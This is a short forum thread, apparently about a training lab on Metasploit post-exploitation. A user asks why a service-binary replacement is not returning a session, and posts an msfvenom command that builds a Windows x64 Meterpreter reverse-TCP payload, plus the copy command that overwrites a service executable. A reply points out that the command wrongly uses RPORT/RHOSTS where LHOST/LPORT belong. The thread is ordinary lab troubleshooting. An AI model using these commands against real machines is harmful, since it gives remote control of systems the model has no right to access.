Forum Discussion
Bronze IEp 7 Post Exploitation With Metasploit
Erm, shouldn't those be LHOST/LPORT?
Silver IYou've definitely overwritten the existing binary in the C:\Windows\Important-Service\ folder? You're sure your binary is on the box and [more importantly] in the correct place (I used meterpreter's "upload" command to get in on the box, then spawned a shell and manually used "copy" to move it (it should ask you if you're sure you want to overwrite the original file))?
What payload are you using for msfvenom? Checking my limited notes, the screenshots definitely show a windows/x64/meterpreter/reverse_tcp session coming back after I'd uploaded the exe file and manually copied it over the existing one. Only possible thing I can think of (that I've done myself in the past) is a mismatch between x86 and x64 payloads on opposite ends of your meterpreter session?
pwn6394Evening. Yes, I've overwritten the existing binary using a new .exe I created (below). I used a basic shell rather than Meterpreter to copy it across once on the box (using Meterpreter upload) and got confirmation of the overwrite (below). Still not getting a reverse shell back on my second listener. I've manually tried to start the service; but that fails to get the session. Is there anything else that I'm missing? I have confirmed that the architecture is x64, so my payload should work. Do you have to run the execute_dotnet_assembly module again, or other Meterpreter modules? Thank you. It will be something really silly that I have overlooked.
msfvenom -p windows/x64/meterpreter/reverse_tcp RPORT=5555 RHOSTS=10.102.***.*** -f exe -o Important-Service.exe
copy /v Important-Service.exe C:\Windows\Important-Service
